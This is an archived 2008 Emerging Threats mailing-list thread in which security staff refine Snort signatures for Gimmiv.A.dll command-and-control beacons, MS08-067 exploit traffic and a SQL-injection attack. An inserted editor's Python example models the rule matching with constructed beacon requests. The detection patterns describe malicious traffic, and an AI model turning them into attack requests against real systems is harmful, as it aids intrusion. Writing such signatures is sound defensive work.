From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Thu, 23 Oct 2008 16:00:08 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20081023200008.0B8AF45026@goliath.jonkmans.com>

[***] Results from Oinkmaster started Thu Oct 23 16:00:07 2008 [***]

[*] Rules modifications: [*]
None.

[+++] Added non-rule lines: [+++]
-> Added to emerging-sid-msg.map (2):
2500061 || ET COMPROMISED Known Compromised or Hostile Host Traffic (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510061 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
-> Added to emerging-sid-msg.map.txt (2):
2500061 || ET COMPROMISED Known Compromised or Hostile Host Traffic (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510061 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

From msconzo at ercot.com Thu Oct 23 17:54:44 2008
From: msconzo at ercot.com (Sconzo, Michael)
Date: Thu, 23 Oct 2008 16:54:44 -0500
Subject: [Emerging-Sigs] Gimmiv.A.dll Infection Sig
Message-ID: <789A6CF2A624E54184956F80CCCAE8600143FA0F@CPWP016I.ercot.com>

Haven't had a good chance to test this, but it seems like it will catch at least http://www.microsoft.com/security/portal/Entry.aspx?name=TrojanSpy%3aWin32%2fGimmiv.A.dll infected hosts. It's a bit late at that time, but you can at least get a handle on any infected machines.

Just needs a real sid in the sig.

alert tcp $INTERNAL_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET Gimmiv.A.dll Infection"; flow:to_server,established; content:"test2.php"; nocase; content:"abc="; nocase; content:"def="; nocase; depth:11; classtype:trojan-activity; sid:0000000; rev:1;)

I could be off-base on this one, if so sorry for the noise.
-=Mike

---
Mike Sconzo
ERCOT Security Operations

From msconzo at ercot.com Thu Oct 23 17:57:42 2008
From: msconzo at ercot.com (Sconzo, Michael)
Date: Thu, 23 Oct 2008 16:57:42 -0500
Subject: [Emerging-Sigs] Gimmiv.A.dll Infection Sig
In-Reply-To: <789A6CF2A624E54184956F80CCCAE8600143FA0F@CPWP016I.ercot.com>
Message-ID: <789A6CF2A624E54184956F80CCCAE8600143FA10@CPWP016I.ercot.com>

Need to remove the depth 11:

alert tcp $INTERNAL_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET Gimmiv.A.dll Infection"; flow:to_server,established; content:"test2.php"; nocase; content:"abc="; nocase; content:"def="; nocase; classtype:trojan-activity; sid:0000000; rev:2;)

-----Original Message-----
From: emerging-sigs-bounces at emergingthreats.net [mailto:emerging-sigs-bounces at emergingthreats.net] On Behalf Of Sconzo, Michael
Sent: Thursday, October 23, 2008 4:55 PM
To: Emerging Threats Signatures
Subject: [Emerging-Sigs] Gimmiv.A.dll Infection Sig

Haven't had a good chance to test this, but it seems like it will catch at least http://www.microsoft.com/security/portal/Entry.aspx?name=TrojanSpy%3aWin32%2fGimmiv.A.dll infected hosts. It's a bit late at that time, but you can at least get a handle on any infected machines.

Just needs a real sid in the sig.

alert tcp $INTERNAL_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET Gimmiv.A.dll Infection"; flow:to_server,established; content:"test2.php"; nocase; content:"abc="; nocase; content:"def="; nocase; depth:11; classtype:trojan-activity; sid:0000000; rev:1;)

I could be off-base on this one, if so sorry for the noise.

-=Mike

---
Mike Sconzo
ERCOT Security Operations

From msconzo at ercot.com Thu Oct 23 19:39:04 2008
From: msconzo at ercot.com (Sconzo, Michael)
Date: Thu, 23 Oct 2008 18:39:04 -0500
Subject: [Emerging-Sigs] Gimmiv.A.dll Infection Sig
In-Reply-To: <789A6CF2A624E54184956F80CCCAE8600143FA10@CPWP016I.ercot.com>
Message-ID: <789A6CF2A624E54184956F80CCCAE8600143FA12@CPWP016I.ercot.com>

I've gotten a couple of pings about this. Here's some more info:
http://www.virustotal.com/analisis/aa0b4951ba47a5780a4fe9d0fdf6d521

Check out the threat expert link at the bottom for some analysis of the software.

-=Mike

-----Original Message-----
From: emerging-sigs-bounces at emergingthreats.net [mailto:emerging-sigs-bounces at emergingthreats.net] On Behalf Of Sconzo, Michael
Sent: Thursday, October 23, 2008 4:58 PM
To: Emerging Threats Signatures
Subject: Re: [Emerging-Sigs] Gimmiv.A.dll Infection Sig

Need to remove the depth 11:

alert tcp $INTERNAL_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET Gimmiv.A.dll Infection"; flow:to_server,established; content:"test2.php"; nocase; content:"abc="; nocase; content:"def="; nocase; classtype:trojan-activity; sid:0000000; rev:2;)

From jonkman at jonkmans.com Thu Oct 23 19:47:14 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 23 Oct 2008 19:47:14 -0400
Subject: [Emerging-Sigs] MS08-067 Sigs
Message-ID: <49010D02.7010209@jonkmans.com>

Great new stuff from Secureworks!

http://www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_MS08-067?rev=1.1

Sigs for the latest MS vuln, patch just released out of cycle. This may be a big one so watch these closely. There is malware exploiting it, which there are also sigs up for.

Matt

--
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc

From jonkman at jonkmans.com Thu Oct 23 19:48:39 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 23 Oct 2008 19:48:39 -0400
Subject: [Emerging-Sigs] Gimmiv.A.dll Infection Sig
In-Reply-To: <789A6CF2A624E54184956F80CCCAE8600143FA12@CPWP016I.ercot.com>
References: <789A6CF2A624E54184956F80CCCAE8600143FA12@CPWP016I.ercot.com>
Message-ID: <49010D57.4060604@jonkmans.com>

Hi Michael. Posting now, sorry for the delay. Any reason not to go uricontent on these?
matt Sconzo, Michael wrote: > I've gotten a couple of pings about this. Here's some more info: > http://www.virustotal.com/analisis/aa0b4951ba47a5780a4fe9d0fdf6d521 > > Check out the threat expert link at the bottom for some analysis of the > software. > > -=Mike > > -----Original Message----- > From: emerging-sigs-bounces at emergingthreats.net > [mailto:emerging-sigs-bounces at emergingthreats.net] On Behalf Of Sconzo, > Michael > Sent: Thursday, October 23, 2008 4:58 PM > To: Emerging Threats Signatures > Subject: Re: [Emerging-Sigs] Gimmiv.A.dll Infection Sig > > Need to remove the depth 11: > > alert tcp $INTERNAL_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET > Gimmiv.A.dll Infection"; flow: to_server,established; > content:"test2.php"; nocase; content:"abc="; nocase; content:"def="; > nocase; classtype: trojan-activity; sid: 0000000; rev:2;) > > -----Original Message----- > From: emerging-sigs-bounces at emergingthreats.net > [mailto:emerging-sigs-bounces at emergingthreats.net] On Behalf Of Sconzo, > Michael > Sent: Thursday, October 23, 2008 4:55 PM > To: Emerging Threats Signatures > Subject: [Emerging-Sigs] Gimmiv.A.dll Infection Sig > > Haven't had a good chance to test this, but it seems like it will catch > at least > http://www.microsoft.com/security/portal/Entry.aspx?name=TrojanSpy%3aWin > 32%2fGimmiv.A.dll infected hosts. It's a bit late at that time, but you > can at least get a handle on any infected machines. > > Just needs a real sid in the sig. > > > alert tcp $INTERNAL_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET > Gimmiv.A.dll Infection"; flow: to_server,established; > content:"test2.php"; nocase; content:"abc="; nocase; content:"def="; > nocase; depth: 11; classtype: trojan-activity; sid: 0000000; rev:1;) > > I could be off-base on this one, if so sorry for the noise. 
> > -=Mike > > --- > Mike Sconzo > ERCOT Security Operations > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From msconzo at ercot.com Thu Oct 23 19:53:09 2008 From: msconzo at ercot.com (Sconzo, Michael) Date: Thu, 23 Oct 2008 18:53:09 -0500 Subject: [Emerging-Sigs] Gimmiv.A.dll Infection Sig In-Reply-To: <49010D57.4060604@jonkmans.com> Message-ID: <789A6CF2A624E54184956F80CCCAE8600143FA14@CPWP016I.ercot.com> I've got no good reason other then that's what I came up with originally in a quick-n-dirty fashion. :) It's probably better to switch to uricontent. -=Mike -----Original Message----- From: Matt Jonkman [mailto:jonkman at jonkmans.com] Sent: Thursday, October 23, 2008 6:49 PM To: Sconzo, Michael Cc: Emerging Threats Signatures Subject: Re: [Emerging-Sigs] Gimmiv.A.dll Infection Sig Hi Michael. Posting now sorry for the delay. Any reason not to go uricontent on these? matt Sconzo, Michael wrote: > I've gotten a couple of pings about this. Here's some more info: > http://www.virustotal.com/analisis/aa0b4951ba47a5780a4fe9d0fdf6d521 > > Check out the threat expert link at the bottom for some analysis of the > software. 
> > -=Mike > > -----Original Message----- > From: emerging-sigs-bounces at emergingthreats.net > [mailto:emerging-sigs-bounces at emergingthreats.net] On Behalf Of Sconzo, > Michael > Sent: Thursday, October 23, 2008 4:58 PM > To: Emerging Threats Signatures > Subject: Re: [Emerging-Sigs] Gimmiv.A.dll Infection Sig > > Need to remove the depth 11: > > alert tcp $INTERNAL_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET > Gimmiv.A.dll Infection"; flow: to_server,established; > content:"test2.php"; nocase; content:"abc="; nocase; content:"def="; > nocase; classtype: trojan-activity; sid: 0000000; rev:2;) > > -----Original Message----- > From: emerging-sigs-bounces at emergingthreats.net > [mailto:emerging-sigs-bounces at emergingthreats.net] On Behalf Of Sconzo, > Michael > Sent: Thursday, October 23, 2008 4:55 PM > To: Emerging Threats Signatures > Subject: [Emerging-Sigs] Gimmiv.A.dll Infection Sig > > Haven't had a good chance to test this, but it seems like it will catch > at least > http://www.microsoft.com/security/portal/Entry.aspx?name=TrojanSpy%3aWin > 32%2fGimmiv.A.dll infected hosts. It's a bit late at that time, but you > can at least get a handle on any infected machines. > > Just needs a real sid in the sig. > > > alert tcp $INTERNAL_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET > Gimmiv.A.dll Infection"; flow: to_server,established; > content:"test2.php"; nocase; content:"abc="; nocase; content:"def="; > nocase; depth: 11; classtype: trojan-activity; sid: 0000000; rev:1;) > > I could be off-base on this one, if so sorry for the noise. 
> > -=Mike > > --- > Mike Sconzo > ERCOT Security Operations > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From jonkman at jonkmans.com Thu Oct 23 19:56:26 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Thu, 23 Oct 2008 19:56:26 -0400 Subject: [Emerging-Sigs] Gimmiv.A.dll Infection Sig In-Reply-To: <789A6CF2A624E54184956F80CCCAE8600143FA14@CPWP016I.ercot.com> References: <789A6CF2A624E54184956F80CCCAE8600143FA14@CPWP016I.ercot.com> Message-ID: <49010F2A.6020802@jonkmans.com> Done deal, posted! Thanks Michael Matt Sconzo, Michael wrote: > I've got no good reason other then that's what I came up with originally > in a quick-n-dirty fashion. :) > > It's probably better to switch to uricontent. > > -=Mike > > -----Original Message----- > From: Matt Jonkman [mailto:jonkman at jonkmans.com] > Sent: Thursday, October 23, 2008 6:49 PM > To: Sconzo, Michael > Cc: Emerging Threats Signatures > Subject: Re: [Emerging-Sigs] Gimmiv.A.dll Infection Sig > > Hi Michael. Posting now sorry for the delay. Any reason not to go > uricontent on these? > > matt > > Sconzo, Michael wrote: >> I've gotten a couple of pings about this. 
Here's some more info: >> http://www.virustotal.com/analisis/aa0b4951ba47a5780a4fe9d0fdf6d521 >> >> Check out the threat expert link at the bottom for some analysis of > the >> software. >> >> -=Mike >> >> -----Original Message----- >> From: emerging-sigs-bounces at emergingthreats.net >> [mailto:emerging-sigs-bounces at emergingthreats.net] On Behalf Of > Sconzo, >> Michael >> Sent: Thursday, October 23, 2008 4:58 PM >> To: Emerging Threats Signatures >> Subject: Re: [Emerging-Sigs] Gimmiv.A.dll Infection Sig >> >> Need to remove the depth 11: >> >> alert tcp $INTERNAL_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET >> Gimmiv.A.dll Infection"; flow: to_server,established; >> content:"test2.php"; nocase; content:"abc="; nocase; content:"def="; >> nocase; classtype: trojan-activity; sid: 0000000; rev:2;) >> >> -----Original Message----- >> From: emerging-sigs-bounces at emergingthreats.net >> [mailto:emerging-sigs-bounces at emergingthreats.net] On Behalf Of > Sconzo, >> Michael >> Sent: Thursday, October 23, 2008 4:55 PM >> To: Emerging Threats Signatures >> Subject: [Emerging-Sigs] Gimmiv.A.dll Infection Sig >> >> Haven't had a good chance to test this, but it seems like it will > catch >> at least >> > http://www.microsoft.com/security/portal/Entry.aspx?name=TrojanSpy%3aWin >> 32%2fGimmiv.A.dll infected hosts. It's a bit late at that time, but > you >> can at least get a handle on any infected machines. >> >> Just needs a real sid in the sig. >> >> >> alert tcp $INTERNAL_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET >> Gimmiv.A.dll Infection"; flow: to_server,established; >> content:"test2.php"; nocase; content:"abc="; nocase; content:"def="; >> nocase; depth: 11; classtype: trojan-activity; sid: 0000000; rev:1;) >> >> I could be off-base on this one, if so sorry for the noise. 
>>
>> -=Mike
>>
>> ---
>> Mike Sconzo
>> ERCOT Security Operations
>>
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------
PGP: http://www.jonkmans.com/mattjonkman.asc


From jsawyer at ufl.edu Thu Oct 23 21:14:19 2008
From: jsawyer at ufl.edu (John H. Sawyer)
Date: Thu, 23 Oct 2008 21:14:19 -0400
Subject: [Emerging-Sigs] MS08-067 Sigs
In-Reply-To: <49010D02.7010209@jonkmans.com>
References: <49010D02.7010209@jonkmans.com>
Message-ID: <12991C02-5757-430E-96D5-2A2B9CD64AE3@ufl.edu>

I ran into a few problems with several of the rules. There are some missing escapes and quotes.

All rules with "..\..\" had to become "..\\..\\"

All rules with "../../ had to become "../../"

-jhs

On Oct 23, 2008, at 7:47 PM, Matt Jonkman wrote:
> Great new stuff from Secureworks!
>
> http://www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_MS08-067?rev=1.1
>
> Sigs for the latest MS vuln, patch just released out of cycle. This may
> be a big one so watch these closely. There is malware exploiting it,
> which there are also sigs up for.
>
> Matt
>
> --
> --------------------------------------------
> Matthew Jonkman
> Emerging Threats
> Phone 765-429-0398
> Fax 312-264-0205
> http://www.emergingthreats.net
> --------------------------------------------
>
> PGP: http://www.jonkmans.com/mattjonkman.asc
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs


From jonkman at jonkmans.com Thu Oct 23 22:49:28 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 23 Oct 2008 22:49:28 -0400
Subject: [Emerging-Sigs] MS08-067 Sigs
In-Reply-To: <12991C02-5757-430E-96D5-2A2B9CD64AE3@ufl.edu>
References: <49010D02.7010209@jonkmans.com> <12991C02-5757-430E-96D5-2A2B9CD64AE3@ufl.edu>
Message-ID: <490137B8.4060301@jonkmans.com>

Ya, fixed that up as I posted them. The version that committed was correct.

Matt

John H. Sawyer wrote:
> I ran into a few problems with several of the rules. There are some
> missing escapes and quotes.
>
> All rules with "..\..\" had to become "..\\..\\"
>
> All rules with "../../ had to become "../../"
>
> -jhs
>
> On Oct 23, 2008, at 7:47 PM, Matt Jonkman wrote:
>
>> Great new stuff from Secureworks!
>>
>> http://www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_MS08-067?rev=1.1
>>
>> Sigs for the latest MS vuln, patch just released out of cycle. This may
>> be a big one so watch these closely. There is malware exploiting it,
>> which there are also sigs up for.
>>
>> Matt
>>
>> --
>> --------------------------------------------
>> Matthew Jonkman
>> Emerging Threats
>> Phone 765-429-0398
>> Fax 312-264-0205
>> http://www.emergingthreats.net
>> --------------------------------------------
>>
>> PGP: http://www.jonkmans.com/mattjonkman.asc
>>
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------
PGP: http://www.jonkmans.com/mattjonkman.asc


From snort at leeclemens.net Thu Oct 23 23:29:33 2008
From: snort at leeclemens.net (Lee Clemens)
Date: Thu, 23 Oct 2008 23:29:33 -0400
Subject: [Emerging-Sigs] Bad Reference: sid:2008681
Message-ID: <006401c93588$bc73f470$c921de0a@edl1314rmfsp7>

Looks like the update to 2008681 is missing the System 'url' from the reference keyword.

reference:www.trendmicro[...]
Should be:
reference:url,www.trendmicro[...]


From dxp2532 at gmail.com Fri Oct 24 00:25:14 2008
From: dxp2532 at gmail.com (dxp)
Date: Fri, 24 Oct 2008 00:25:14 -0400
Subject: [Emerging-Sigs] Gimmiv.A.dll Infection Sig
In-Reply-To: <49010F2A.6020802@jonkmans.com>
References: <789A6CF2A624E54184956F80CCCAE8600143FA14@CPWP016I.ercot.com> <49010F2A.6020802@jonkmans.com>
Message-ID: <637078af0810232125vcac0298j102120cc10878fd1@mail.gmail.com>

Looking at other Gimmiv threatexpert reports it appears that "/test2.php" is not static, the number varies. So far it looks like a single digit integer, so perhaps a pattern match for something like "/test[0-9].php" would be better.
-- dxp On Thu, Oct 23, 2008 at 7:56 PM, Matt Jonkman wrote: > Done deal, posted! > > Thanks Michael > > Matt > > Sconzo, Michael wrote: > > I've got no good reason other then that's what I came up with originally > > in a quick-n-dirty fashion. :) > > > > It's probably better to switch to uricontent. > > > > -=Mike > > > > -----Original Message----- > > From: Matt Jonkman [mailto:jonkman at jonkmans.com] > > Sent: Thursday, October 23, 2008 6:49 PM > > To: Sconzo, Michael > > Cc: Emerging Threats Signatures > > Subject: Re: [Emerging-Sigs] Gimmiv.A.dll Infection Sig > > > > Hi Michael. Posting now sorry for the delay. Any reason not to go > > uricontent on these? > > > > matt > > > > Sconzo, Michael wrote: > >> I've gotten a couple of pings about this. Here's some more info: > >> http://www.virustotal.com/analisis/aa0b4951ba47a5780a4fe9d0fdf6d521 > >> > >> Check out the threat expert link at the bottom for some analysis of > > the > >> software. > >> > >> -=Mike > >> > >> -----Original Message----- > >> From: emerging-sigs-bounces at emergingthreats.net > >> [mailto:emerging-sigs-bounces at emergingthreats.net] On Behalf Of > > Sconzo, > >> Michael > >> Sent: Thursday, October 23, 2008 4:58 PM > >> To: Emerging Threats Signatures > >> Subject: Re: [Emerging-Sigs] Gimmiv.A.dll Infection Sig > >> > >> Need to remove the depth 11: > >> > >> alert tcp $INTERNAL_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET > >> Gimmiv.A.dll Infection"; flow: to_server,established; > >> content:"test2.php"; nocase; content:"abc="; nocase; content:"def="; > >> nocase; classtype: trojan-activity; sid: 0000000; rev:2;) > >> > >> -----Original Message----- > >> From: emerging-sigs-bounces at emergingthreats.net > >> [mailto:emerging-sigs-bounces at emergingthreats.net] On Behalf Of > > Sconzo, > >> Michael > >> Sent: Thursday, October 23, 2008 4:55 PM > >> To: Emerging Threats Signatures > >> Subject: [Emerging-Sigs] Gimmiv.A.dll Infection Sig > >> > >> Haven't had a good chance to test 
this, but it seems like it will > > catch > >> at least > >> > > http://www.microsoft.com/security/portal/Entry.aspx?name=TrojanSpy%3aWin > >> 32%2fGimmiv.A.dll infected hosts. It's a bit late at that time, but > > you > >> can at least get a handle on any infected machines. > >> > >> Just needs a real sid in the sig. > >> > >> > >> alert tcp $INTERNAL_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET > >> Gimmiv.A.dll Infection"; flow: to_server,established; > >> content:"test2.php"; nocase; content:"abc="; nocase; content:"def="; > >> nocase; depth: 11; classtype: trojan-activity; sid: 0000000; rev:1;) > >> > >> I could be off-base on this one, if so sorry for the noise. > >> > >> -=Mike > >> > >> --- > >> Mike Sconzo > >> ERCOT Security Operations > >> > >> _______________________________________________ > >> Emerging-sigs mailing list > >> Emerging-sigs at emergingthreats.net > >> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > >> _______________________________________________ > >> Emerging-sigs mailing list > >> Emerging-sigs at emergingthreats.net > >> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > >> _______________________________________________ > >> Emerging-sigs mailing list > >> Emerging-sigs at emergingthreats.net > >> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > > > > -- > -------------------------------------------- > Matthew Jonkman > Emerging Threats > Phone 765-429-0398 > Fax 312-264-0205 > http://www.emergingthreats.net > -------------------------------------------- > > PGP: http://www.jonkmans.com/mattjonkman.asc > > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > -------------- next part -------------- An HTML attachment was scrubbed... 
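An added example, the editor's and not Snort or Emerging Threats code, to make the three points in this Gimmiv.A.dll thread concrete: why the `depth: 11` in rev:1 could never fire (a `depth` modifier binds to the content immediately before it, here `"def="`, and requires that match to end within the first 11 bytes of the payload), what switching to `uricontent` buys (the pattern is checked only against the normalized request URI, not headers or body, so a Referer mentioning `test2.php` no longer trips it), and how dxp's `/test[0-9].php` generalisation looks as a `pcre` with the `U` flag. It is a small Python model of the Snort 2.x option semantics involved. The URI-form rule, the sample requests and the host name `c2.invalid` are assumptions constructed for the example, and the normalization is percent-decoding only, a stand-in for http_inspect.

```python
"""Minimal model of the Snort 2.x rule options used in the Gimmiv.A.dll
thread (content, uricontent, nocase, depth, pcre with /U and /i).
Editor's example, not Snort and not Emerging Threats code; sample
requests are constructed, the normalization is percent-decoding only."""
import re
from urllib.parse import unquote

# Option block of Mike Sconzo's rev:2 rule, as posted to the list.
REV2 = ('msg:"ET Gimmiv.A.dll Infection"; flow: to_server,established; '
        'content:"test2.php"; nocase; content:"abc="; nocase; '
        'content:"def="; nocase; classtype: trojan-activity; sid: 0000000; rev:2;')
# rev:1 differed only by a trailing depth, which binds to content:"def=".
REV1 = REV2.replace('content:"def="; nocase;', 'content:"def="; nocase; depth: 11;')
# Hypothetical uricontent/pcre rendering of dxp's /test[0-9].php suggestion
# (editor's assumption, not the rule that was actually committed).
URI = ('msg:"ET Gimmiv.A.dll Infection (uri)"; flow:to_server,established; '
       'uricontent:"/test"; nocase; uricontent:".php"; nocase; '
       'pcre:"/\\/test[0-9]\\.php/Ui"; uricontent:"abc="; nocase; '
       'uricontent:"def="; nocase; classtype:trojan-activity; sid:0000000; rev:3;')

def split_options(opts):
    """Split on ';' outside double quotes; a backslash escapes the next char."""
    out, cur, inq, esc = [], [], False, False
    for ch in opts:
        if esc:
            cur.append(ch); esc = False
        elif ch == '\\':
            cur.append(ch); esc = True
        elif ch == '"':
            inq = not inq; cur.append(ch)
        elif ch == ';' and not inq:
            out.append(''.join(cur).strip()); cur = []
        else:
            cur.append(ch)
    return out

def decode_content(quoted):
    """Snort content string -> bytes: backslash escapes and |hex| runs."""
    s = quoted.strip()[1:-1]
    out, i = bytearray(), 0
    while i < len(s):
        if s[i] == '\\':                        # \; \" \\ \| -> literal char
            out += s[i + 1].encode('latin-1'); i += 2
        elif s[i] == '|':                       # |2F 20| -> raw bytes
            j = s.index('|', i + 1)
            out += bytes.fromhex(s[i + 1:j]); i = j + 1
        else:
            out += s[i].encode('latin-1'); i += 1
    return bytes(out)

def parse_checks(opts):
    """Matchable checks in rule order; options not modelled are ignored."""
    checks = []
    for opt in split_options(opts):
        name, _, value = opt.partition(':')
        name, value = name.strip(), value.strip()
        if name in ('content', 'uricontent'):
            checks.append({'buf': 'uri' if name == 'uricontent' else 'payload',
                           'pat': decode_content(value), 'nocase': False, 'depth': None})
        elif name == 'nocase':
            checks[-1]['nocase'] = True         # modifies the preceding content
        elif name == 'depth':
            checks[-1]['depth'] = int(value)    # likewise
        elif name == 'pcre':
            regex, flags = value.strip('"')[1:].rsplit('/', 1)
            checks.append({'buf': 'uri' if 'U' in flags else 'payload',
                           'regex': re.compile(regex.encode(), re.I if 'i' in flags else 0)})
    return checks

def normalized_uri(payload):
    """Request-target from the request line, percent-decoded."""
    parts = payload.split(b'\r\n', 1)[0].split(b' ')
    raw = parts[1] if len(parts) > 1 else b''
    return unquote(raw.decode('latin-1')).encode('latin-1')

def rule_matches(opts, payload):
    """True if every modelled check in the option block passes."""
    uri = normalized_uri(payload)
    for c in parse_checks(opts):
        buf = uri if c['buf'] == 'uri' else payload
        if 'regex' in c:
            if not c['regex'].search(buf):
                return False
            continue
        hay, pat = (buf.lower(), c['pat'].lower()) if c['nocase'] else (buf, c['pat'])
        if c['depth'] is not None:              # match must end within depth bytes
            hay = hay[:c['depth']]
        if pat not in hay:
            return False
    return True

# Constructed requests; c2.invalid is a placeholder, not a real host.
BEACON2 = b"GET /test2.php?abc=1&def=2 HTTP/1.1\r\nHost: c2.invalid\r\n\r\n"
BEACON7 = b"GET /test7.php?abc=1&def=2 HTTP/1.1\r\nHost: c2.invalid\r\n\r\n"
ENCODED = b"GET /test4%2ephp?abc=1&def=2 HTTP/1.1\r\nHost: c2.invalid\r\n\r\n"
REFERER = (b"GET /index.html HTTP/1.1\r\nHost: www.invalid\r\n"
           b"Referer: http://c2.invalid/test2.php?abc=1&def=2\r\n\r\n")

if __name__ == '__main__':
    for name, rule in (('rev1', REV1), ('rev2', REV2), ('uri', URI)):
        print(name, [rule_matches(rule, p) for p in (BEACON2, BEACON7, ENCODED, REFERER)])
```

Run as a script it prints one row per rule over the four requests: rev:1 matches nothing, rev:2 matches the `test2.php` beacon but also the benign request whose Referer carries the same strings, and the `uricontent`/`pcre` form matches `test2`, `test7` and the percent-encoded `test4%2ephp` while ignoring the Referer case. `decode_content` also shows why the backslash escapes John Sawyer mentions are needed: `"..\\..\\"` in a rule is the six bytes `..\..\`, and a byte written between pipes is hex, so `|2F|` is `/`.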
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081024/f6176091/attachment.html


From frank at knobbe.us Fri Oct 24 00:26:42 2008
From: frank at knobbe.us (Frank Knobbe)
Date: Thu, 23 Oct 2008 23:26:42 -0500
Subject: [Emerging-Sigs] Bad Reference: sid:2008681
In-Reply-To: <006401c93588$bc73f470$c921de0a@edl1314rmfsp7>
References: <006401c93588$bc73f470$c921de0a@edl1314rmfsp7>
Message-ID: <1224822402.38559.83.camel@localhost>

On Thu, 2008-10-23 at 23:29 -0400, Lee Clemens wrote:
> Looks like the update to 2008681 is missing the System 'url' from the
> reference keyword.
>
> reference:www.trendmicro[...]
> Should be:
> reference:url,www.trendmicro[...]

Indeed. It's fixed in CVS now. Tarballs should be updated shortly.

Thanks!
Frank

-- 
It is said that the Internet is a public utility. As such, it is best compared to a sewer. A big, fat pipe with a bunch of crap sloshing against your ports.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 187 bytes
Desc: This is a digitally signed message part
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081023/6807fec4/attachment.bin


From signatures at stillsecure.com Fri Oct 24 09:08:32 2008
From: signatures at stillsecure.com (signatures)
Date: Fri, 24 Oct 2008 07:08:32 -0600
Subject: [Emerging-Sigs] StillSecure: 4 New Signatures - Oct-24-2008
Message-ID: <5C9E8CCEEB81ED498AC0C3B0054704F3054C290E@webmail.latis.com>

Hi Matt,

Please find 4 New Signatures below:

1. Simple Customer contact.php SQL injection

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Simple Customer contact.php SQL injection"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/contact.php?id="; nocase; uricontent:"UNION"; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:bugtraq,28852; sid:8518; rev:1;)

2. ShopMaker product.php id Parameter Remote SQL Injection

